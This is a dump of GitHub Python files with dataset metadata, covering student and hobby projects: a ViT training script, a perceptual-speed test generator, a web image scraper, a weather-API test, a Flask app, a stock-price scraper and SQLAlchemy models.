random\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_pretrained_vit import ViT\nfrom p1_dataset import p1_data\n\n# Set random seed for reproducibility\nmanualSeed = 0\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\nbatch_size = 8\nworkers = 2\nlr = 1e-5\nweight_decay = 1e-5\nnum_epochs = 30\nnum_classes = 37\n\n\nroot = 'hw3_data/p1_data'\nmodel_dir = './p1_models'\nos.makedirs(model_dir, exist_ok=True)\n\ntrain_dir = os.path.join(root, 'train')\nvalid_dir = os.path.join(root, 'val')\n\ntrain_tfm = transforms.Compose([\n transforms.RandomRotation(30), \n transforms.RandomResizedCrop(384, scale=(0.8, 1.0)),\n transforms.ColorJitter(brightness=0.3),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\ntest_tfm = transforms.Compose([\n transforms.Resize((384, 384)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\ntrain_dataset = p1_data(train_dir, mode='train', transform=train_tfm)\nvalid_dataset = p1_data(valid_dir, mode='valid', transform=test_tfm)\n\n# Create the dataloader\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)\nvalid_loader = DataLoader(valid_dataset, batch_size=batch_size, shuffle=False, num_workers=workers)\n\n# Decide which device we want to run on\ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\n\nmodel = ViT('B_16_imagenet1k', pretrained=True, num_classes=num_classes)\nmodel = model.to(device)\nprint(model)\n\n# Initialize Loss function\ncriterion = nn.CrossEntropyLoss()\n\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\n\n# Training Loop\ntrain_losses = []\n\nfor epoch in range(num_epochs):\n\n # ---------- Training ----------\n # Make sure the model is in train mode before training.\n model.train()\n\n # These are used to record information in training.\n train_loss = []\n train_accs = []\n\n # Iterate the training set by batches.\n for i, batch in enumerate(train_loader):\n \n # A batch consists of image data and corresponding labels.\n imgs, labels = batch\n labels = labels.long().to(device)\n \n # Forward the data. (Make sure data and model are on the same device.)\n logits = model(imgs.to(device))\n \n # Calculate the cross-entropy loss.\n # We don't need to apply softmax before computing cross-entropy as it is done automatically.\n loss = criterion(logits, labels)\n\n # Gradients stored in the parameters in the previous step should be cleared out first.\n optimizer.zero_grad()\n \n # Compute the gradients for parameters.\n loss.backward()\n \n # Update the parameters with computed gradients.\n optimizer.step()\n \n # Compute the accuracy for current batch.\n acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()\n \n # Record the loss and accuracy.\n train_loss.append(loss.item())\n train_accs.append(acc)\n\n # The average loss and accuracy of the training set is the average of the recorded values.\n train_loss = sum(train_loss) / len(train_loss)\n train_acc = sum(train_accs) / len(train_accs)\n train_losses.append(train_loss)\n # Print the information.\n print(f\"[{epoch+1:03d}/{num_epochs:03d}] loss = {train_loss:.5f}, acc = {train_acc:.5f}\")\n torch.save(model.state_dict(), os.path.join(model_dir, 'p1_model.pth'))\n\nplt.figure(figsize=(10,5))\nplt.title(\"Training Loss\")\nplt.plot(train_losses,label=\"train\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.savefig(\"./p1_Loss.png\")\n\n# Testing\nprint('Testing started!')\nmodel.eval()\ntest_hit = 0\nfor i, batch in enumerate(valid_loader):\n imgs, labels = batch\n with torch.no_grad():\n logits = model(imgs.to(device))\n\n test_hit += (logits.argmax(dim=-1) == labels.to(device)).sum()\n\ntest_acc = test_hit / len(valid_dataset)\nprint(f\"Testing Acc = {test_acc:.4f}\")\n", "repo_name": "yiwei32/NTU_courses", "sub_path": "2021_Fall/DLCV/hw3/p1_train.py", "file_name": "p1_train.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 17, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "p1_dataset.p1_data", "line_number": 47, "usage_type": "call"}, {"api_name": "p1_dataset.p1_data", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_vit.ViT", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "38143746710", "text": "from random import choice, choices, randint\r\nfrom datetime import datetime\r\nfrom json import load\r\nfrom fpdf import FPDF\r\n\r\n\r\ndef print_report_to_pdf(pdf, report):\r\n \"\"\" Function which writes the data from report in pdf file.\"\"\"\r\n table_cell_width = 30\r\n table_cell_height = 5\r\n pdf.set_font('Times', '', 10)\r\n column_names = report[0].keys()\r\n\r\n for column in column_names:\r\n pdf.cell(table_cell_width, table_cell_height, column, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n pdf.set_font('Times', '', 10)\r\n\r\n for line in report:\r\n for column in column_names:\r\n if line[\"Correct answer\"] != line[\"User choice\"]:\r\n pdf.set_font('Times', 'B', 10)\r\n if column == \"Correct answer\":\r\n pdf.set_text_color(0, 255, 0)\r\n elif column == \"User choice\":\r\n pdf.set_text_color(255, 0, 0)\r\n else:\r\n pdf.set_text_color(0, 0, 0)\r\n else:\r\n pdf.set_font('Times', '', 10)\r\n pdf.set_text_color(0, 0, 0)\r\n value = str(line[column])\r\n if column == 'Letters':\r\n table_cell_height = 5\r\n x = pdf.get_x()\r\n y = pdf.get_y()\r\n pdf.multi_cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.set_xy(x + table_cell_width, y)\r\n else:\r\n table_cell_height = 10\r\n pdf.cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n\r\n\r\nclass PerceptualSpeed:\r\n def __init__(self):\r\n with open('resources/letters.json') as letters_file:\r\n self.letters = load(letters_file)\r\n self.upper_row = []\r\n self.lower_row = []\r\n self.report = []\r\n self.questions = 0\r\n self.answer = 0\r\n self.user_answer = 0\r\n self.score = 0\r\n\r\n def choice_letters(self):\r\n \"\"\" Generate a pair of random letters.\"\"\"\r\n letter = choice(list(self.letters.keys()))\r\n letter_weights = [1 for _ in range(0, len(list(self.letters.keys())))]\r\n for character in self.letters[letter]:\r\n index = list(self.letters.keys()).index(character)\r\n letter_weights[index] += 19\r\n letter_weights[list(self.letters.keys()).index(letter)] += 34\r\n pair_letter = choices(list(self.letters.keys()), weights=letter_weights, k=1)\r\n # print(letter, pair_letter[0])\r\n return [letter, pair_letter[0]]\r\n\r\n def get_letters(self):\r\n \"\"\" Generate 4 pairs of letters. \"\"\"\r\n self.upper_row = []\r\n self.lower_row = []\r\n while len(self.upper_row) < 4:\r\n pair = self.choice_letters()\r\n if pair[0] not in self.upper_row and pair[1] not in self.lower_row:\r\n self.upper_row.append(pair[0])\r\n self.lower_row.append(pair[1])\r\n self.questions += 1\r\n if randint(0, 1) == 0:\r\n self.upper_row = [letter.upper() for letter in self.upper_row]\r\n else:\r\n self.lower_row = [letter.upper() for letter in self.lower_row]\r\n\r\n def find_answer(self):\r\n \"\"\" Find the number of matching letter pairs.\"\"\"\r\n self.answer = 0\r\n for index in range(4):\r\n if self.upper_row[index].lower() == self.lower_row[index].lower():\r\n self.answer += 1\r\n\r\n def check_answer(self, user_choice):\r\n \"\"\" Check if user has guessed the correct answer. It adds the exercise to the report.\"\"\"\r\n self.user_answer = user_choice\r\n self.add_report()\r\n if self.answer == self.user_answer:\r\n return True\r\n return False\r\n\r\n def add_report(self):\r\n \"\"\" Insert the question with the correct answer and the user's choice\r\n inside a report list.\r\n \"\"\"\r\n letters = f\"{self.upper_row[0]} {self.upper_row[1]} {self.upper_row[2]}\" \\\r\n f\" {self.upper_row[3]}\\n{self.lower_row[0]} {self.lower_row[1]}\" \\\r\n f\" {self.lower_row[2]} {self.lower_row[3]}\"\r\n self.report.append({\"Question No\": self.questions, \"Letters\": letters,\r\n \"Correct answer\": self.answer, \"User choice\": self.user_answer})\r\n\r\n def save_report(self):\r\n \"\"\" Saves the report of this test in a .pdf file. \"\"\"\r\n time_now = datetime.now()\r\n time_format = \"%d/%m/%Y %H:%M\"\r\n date_time = time_now.strftime(time_format)\r\n\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font('Times', 'B', 16)\r\n pdf.cell(195, 10, 'PERCEPTUAL SPEED TEST REPORT', 0, 1, 'C')\r\n pdf.cell(195, 10, date_time, 0, 1, 'C')\r\n pdf.cell(195, 10, f\"Score: {self.score}/{self.questions - 1}\", 0, 1, 'C')\r\n pdf.ln(10)\r\n\r\n print_report_to_pdf(pdf, self.report)\r\n\r\n time_format = \"%H-%M_%d-%m-%Y\"\r\n date_time = time_now.strftime(time_format)\r\n pdf.output(f'reports/{date_time}_perceptual_speed_report.pdf', 'F')\r\n self.report.clear()\r\n", "repo_name": "DanielM24/GIA-Practice-Tests", "sub_path": "perceptual_speed.py", "file_name": "perceptual_speed.py", "file_ext": "py", "file_size_in_byte": 5106, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 59, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 65, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 111, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 111, "usage_type": "name"}, {"api_name": "fpdf.FPDF", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "29719035240", "text": "\n\n\nimport threading\nimport cv2\nimport numpy as np\n\ndef sub(obj, ROI):\n np.copyto(ROI[:,:,0],obj.apply(ROI, None, -1))\n\nfgbg = cv2.createBackgroundSubtractorKNN(100, 500, False)\n\nthreadcount = 10\nthreads = []\ndata = []\n\nfor x in range(threadcount):\n data.append((255 * np.random.rand(320, 200, 1)).astype(dtype=\"uint8\"))\n threads.append(threading.Thread(target=sub, args=[fgbg, data[x]]))\n\n# Start them all\nfor thread in threads:\n thread.start()\n\n# Wait for all to complete\nfor thread in threads:\n thread.join()\n\nprint()\n\n\n", "repo_name": "janssenda/test-async-py", "sub_path": "complex-process.py", "file_name": "complex-process.py", "file_ext": "py", "file_size_in_byte": 537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.copyto", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createBackgroundSubtractorKNN", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "36622721246", "text": "from bs4 import BeautifulSoup\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\ndef startSearch():\n ##Initialize the search\n search = input('Search for:')\n params = {'q': search}\n ##Replaces spaces with unnderscores for url search\n dir_name = search.replace(' ', '_').lower()\n ##If a directory with the search term doesnt exist, make a directory for it\n if not os.path.isdir(dir_name):\n os.makedirs(dir_name)\n ## Get the url plugging in the provided search term as the parameter\n r = requests.get('http://www.bing.com/images/search', params=params)\n # Intialize the HTML soup\n soup = BeautifulSoup(r.text, 'html.parser')\n ## Parse the soup for all a tags with a class of thumb\n links = soup.findAll('a', {'class': 'thumb'})\n\n for item in links:\n try:\n ## Get the link of each a tag\n img_obj = requests.get(item.attrs['href'])\n print(\"getting\", item.attrs['href'])\n title = item.attrs['href'].split('/')[-1]\n try:\n ## Get the image inside of the a tag\n img = Image.open(BytesIO(img_obj.content))\n ## Save that image in the directory\n img.save('./' + dir_name + '/' + title, img.format)\n except:\n print('could not save image')\n except:\n print(\"could not request Image\")\n startSearch()\n\n## Initialize the search by calling the function\nstartSearch()\n\n", "repo_name": "cirrusm/web-scraper", "sub_path": "images.py", "file_name": "images.py", "file_ext": "py", "file_size_in_byte": 1488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "35221357611", "text": "import pytest\nimport requests\n\ndef test_weather_correct():\n url = \"https://opendata.cwb.gov.tw/api/v1/rest/datastore/F-D0047-061?Authorization=CWB-E0CBEB14-87B4-49A9-A4CA-A3240E63E9F4\"\n\n # 執行 API 呼叫並取得回應\n response = fetch_weather_data(url)\n\n # 確認回應的狀態碼為 200 (表示成功)\n assert response.status_code == 200\n\n # 確認回應的 JSON 資料中包含了 'records'、'locations' 和 'location' 的項目\n assert 'records' in response.json()\n assert 'locations' in response.json()['records']\n assert 'location' in response.json()['records']['locations'][0]\n\n # 取得文山區的資料\n locations = response.json()['records']['locations'][0]['location']\n wen_location = [x for x in locations if x['locationName'] == '文山區'][0]\n\n # 確認回應的 JSON 資料中包含了 'weatherElement' 的項目\n assert 'weatherElement' in wen_location\n\n # 取得天氣描述的資料\n elementNames = wen_location['weatherElement']\n WeatherDescription_elementName = [x for x in elementNames if x['elementName'] == 'WeatherDescription'][0]\n\n # 確認回應的 JSON 資料中包含了 'time' 的項目\n assert 'time' in WeatherDescription_elementName\n\n # 取得時間描述的資料\n time_descs = WeatherDescription_elementName['time']\n\n # 確認時間描述資料不為空\n assert len(time_descs) > 0\n\ndef fetch_weather_data(url):\n response = requests.get(url)\n return response\n", "repo_name": "yuu0223/FastAPI_Backend", "sub_path": "my-app/tests/test_weather.py", "file_name": "test_weather.py", "file_ext": "py", "file_size_in_byte": 1476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "4114073938", "text": "import sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom flask import Flask\nfrom flask_jsglue import JSGlue\nfrom flask_sqlalchemy_session import flask_scoped_session\n\n\ndef create_app():\n app = Flask(__name__)\n\n db_session = init_db(app)\n\n jsglue = JSGlue()\n jsglue.init_app(app)\n\n from main import bp as main_bp\n app.register_blueprint(main_bp)\n\n return app\n\n\ndef init_db(app):\n from db import Base\n engine = create_engine(url='sqlite:///./db.sqlite', convert_unicode=True, connect_args={})\n session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\n try:\n Base.metadata.create_all(bind=engine)\n except Exception as e:\n print(\"Cannot create DB, because: \", str(e), file=sys.stderr)\n\n db_session = flask_scoped_session(session_factory, app)\n Base.query = db_session.query_property()\n return db_session\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run(debug=True, host='127.0.0.1', port=2000)\n", "repo_name": "Discyo/Discyo-WebInterface", "sub_path": "web_interface/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_jsglue.JSGlue", "line_number": 15, "usage_type": "call"}, {"api_name": "main.bp", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 27, "usage_type": "call"}, {"api_name": "db.Base.metadata.create_all", "line_number": 30, "usage_type": "call"}, {"api_name": "db.Base.metadata", "line_number": 30, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy_session.flask_scoped_session", "line_number": 34, "usage_type": "call"}, {"api_name": "db.Base.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "43180279402", "text": "\"\"\"\r\n\r\nBusiness logic:\r\n\r\n1. scrape code from the web by HTTP request \r\n2. For loop with code in pandas to get data \r\n3. Save it in table and send to database (Or excel) ... storing the code status: append code into code \r\n\r\n# for append being pass to pandas and show in tables\r\n\r\n\"\"\"\r\n\r\n# 1. Scraping Teams\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport string\r\nimport re\r\n\r\n\r\n# 2. Accessing Stock data\r\nfrom datetime import datetime, timedelta\r\nimport pandas_datareader.data as web\r\n\r\n# 3. Forming DataFrame\r\nimport pandas as pd\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n\r\n# Part 1: Getting the US Stock Code \r\n\r\ncodes = [] # store codes\r\nletters = list(string.ascii_uppercase) # Setting A-Z letter list \r\n\r\nprint(\"\\033[1;32;1m Executing Mission 1 ... \\033[0m\\n\") # Green color for signal\r\n\r\nfor letter in letters:\r\n url = f\"https://eoddata.com/stocklist/NASDAQ/{letter}.htm\" # Capital A-Z according to web's pattern\r\n req = requests.get(url)\r\n soup = BeautifulSoup(req.content, 'lxml') # turn into DOM structure\r\n \r\n # filter with special pattern: stockquote/NASDAQ/...\r\n tags = soup.find_all(\"a\", href=re.compile(\"/stockquote/NASDAQ/\")) # regular expression for specified searching \r\n\r\n for t in tags: \r\n if (t.string is not None):\r\n codes.append(t.string)\r\n \r\nprint(\"\\033[1;32;1m Mission 1 Complete ! \\033[0m\\n\") \r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n# Part 2: Access data from pandas\r\n\r\ncount = 0 # successful searching\r\nerrorCount = 0 # fail searching\r\n\r\nendDate = datetime.now() # Current time system (your computer)\r\nstartDate = endDate - timedelta(days=1) # Two days before current (your computer)\r\n\r\nstr_endDate = endDate.strftime(\"%Y-%m-%d\") # date obj. to string \r\nstr_startDate = startDate.strftime(\"%Y-%m-%d\") \r\nerrorCode = [] # append to list\r\n\r\ncodeStatus = { # Open, close, and volume\r\n \"code\": [],\r\n \"date\": [],\r\n \"codeOpen ($)\": [],\r\n \"codeClose ($)\": [],\r\n \"codeVolume\": []\r\n }\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 2 ... \\033[0m\\n\")\r\n\r\nfor code in codes:\r\n try:\r\n data = web.DataReader(code, \"yahoo\", str_startDate, str_endDate) # Stock_code, search_engine, start_date, end_date\r\n # 要最新果日 (SCRARPE TIME: 香港時間 2022/01/29 01:20 AM, 但用\"2022-01-28\", \"2022-01-29\" 會顯示出27, 28 日的價(可能是時差問題))\r\n \r\n # Attracting the number of rows from the dataset\r\n for i in range(data.shape[0]): # according to its number of row\r\n stockDate = data.index[i].strftime(\"%Y-%m-%d\") # newly added, maybe wrong\r\n stockOpen = data[\"Open\"][i]\r\n stockClose = data[\"Close\"][i]\r\n stockVolume = data[\"Volume\"][i]\r\n \r\n codeStatus[\"code\"].append(code)\r\n codeStatus[\"date\"].append(stockDate)\r\n codeStatus[\"codeOpen ($)\"].append(stockOpen)\r\n codeStatus[\"codeClose ($)\"].append(stockClose)\r\n codeStatus[\"codeVolume\"].append(stockVolume)\r\n \r\n print(f\" Successful: {code}\")\r\n \r\n except:\r\n print(f\"\\033[1;31m Has probelems on -----{code} \\033[0m\") # red color for fail \r\n errorCode.append(code)\r\n \r\n \r\nprint(\"\\033[1;32;1m Mission 2 Complete ! \\033[0m\\n\")\r\n\r\n#----------------------------------------------------------------------------------------------\r\n\r\n# Part 3: Convert Dict to DataFrame and export to CSV file\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 3 ... \\033[0m\\n\")\r\n\r\ndf = pd.DataFrame(codeStatus)\r\ndf.to_csv(f\"stockList_{str_endDate}.csv\", index=False)\r\n# df.to_excel(f\"stockList_{str_endDate}.xlsx\", index=False) // If you want to save as excel\r\n\r\n\r\nprint(f\"Number of stock access: {count}\")\r\nprint(f\"Number of error encounter while scraping: {len(errorCount)}\")\r\nprint(errorCount) \r\n \r\n\r\nprint(\"\\033[1;32;1m Mission 3 Complete ! \\033[0m\\n\")\r\nprint(\"\\033[1;32;1m Finish !!! \\033[0m\\n\")\r\n\r\n# --------------------------------------------------------------------------------------------------\r\n\r\n\"\"\"\r\nCREATE TABLE StockObservation (\r\n id INT PRIMARY KEY AUTO INCREMENT,\r\n Date TIMESTAMP, \r\n OpenPrice DOUBLE,\r\n ClosePrice DOUBLE,\r\n VOLUME INT\r\n)\r\n\r\nSELECT * FROM StockObservation WHERE ....\r\n\"\"\"\r\n", "repo_name": "kcwu229/Investment-Analysis-Program-BetaStock", "sub_path": "Algorithmic Trading Project/Application.py", "file_name": "Application.py", "file_ext": "py", "file_size_in_byte": 4798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "string.ascii_uppercase", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas_datareader.data.DataReader", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 77, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "70010032487", "text": "from uuid import UUID, uuid4\nfrom enum import StrEnum, auto\n\nfrom sqlalchemy import Uuid, ForeignKey\nfrom sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship\n\nclass Base(DeclarativeBase):\n pass\n\nclass Alcohol(StrEnum):\n VODKA = auto()\n WHISKEY = auto()\n RUM = auto()\n GIN = auto()\n TEQUILA = auto()\n BRANDY = auto()\n LIQUEUR = auto()\n\nclass Drink(Base):\n __tablename__ = \"drinkEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n base_drink: Mapped[list[Alcohol]] = mapped_column()\n name: Mapped[str] = mapped_column()\n component_ids: Mapped[list[UUID]] = mapped_column(ForeignKey(\"componentEntity.id\"))\n drinks: Mapped[\"Component\"] = relationship(back_populates=\"components\")\n \nclass Component(Base):\n __tablename__ = \"componentEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n components: Mapped[\"Drink\"] = relationship(back_populates=\"drinks\")\n", "repo_name": "Chrosto9/mixology", "sub_path": "mixology-api/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 973, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.orm.DeclarativeBase", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 10, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 11, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 12, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 14, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 15, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 16, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 22, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 25, "usage_type": "name"}, {"api_name": "uuid.UUID", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 31, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "32824013431", "text": "from __future__ import print_function\nimport utilities as DDM17\nimport pandas as pd\nimport sqlite3 as lite\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef read_visualisation_data():\n \"\"\"\n Read in the visualisation data from the database using Pandas\n\n Returns\n -------\n table_names : list\n A list of table names (or data set names)\n data : dict\n A dictionary of tables. The top-level key is the name of the data\n set. 